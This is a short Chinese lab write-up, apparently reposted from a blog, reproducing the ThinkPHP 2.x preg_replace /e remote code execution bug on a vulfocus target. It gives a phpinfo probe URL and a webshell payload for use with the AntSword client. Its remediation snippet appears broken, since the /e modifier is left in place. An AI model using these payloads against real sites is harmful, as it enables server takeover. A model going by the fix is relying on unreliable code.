标签:preg 2x replace 代码执行 depr thinkphp rce
thinkphp-2x-rce 代码执行
漏洞描述
ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
影响版本
Thinkphp 2.x的版本
实验环境
攻击机:win10
靶机:vulfocus平台 thinkphp-2x-rce 代码执行
漏洞复现
首先打开靶机 vulfocus平台 thinkphp-2x-rce 代码执行
根据漏洞的描述 是preg_replace的/e模式匹配路由
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'/]+)@e', '$var['1']="2";', implode($depr,$paths));
直接访问
/a/b/c/${@phpinfo()} 打开phpinfo
构建payload :
/a/b/c/${@print(($_POST[1]))} // 一句话木马
打开蚁剑 进行连接 然后就可以直接在tmp文件下找到flag
原理
首先百度了一下什么是 PHP preg_replace() 函数
preg_replace :函数执行一个正则表达式的搜索和替换。
修复方案
将Dispatcher.class.php文件中的代码
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'/]+)@e', '$var['1']="2";', implode($depr,$paths));
修改为
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'/]+)@e', '$var['1']="2';', implode($depr,$paths));
标签:preg,2x,replace,代码执行,depr,thinkphp,rce 来源: https://www.cnblogs.com/fanwd/p/15164677.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。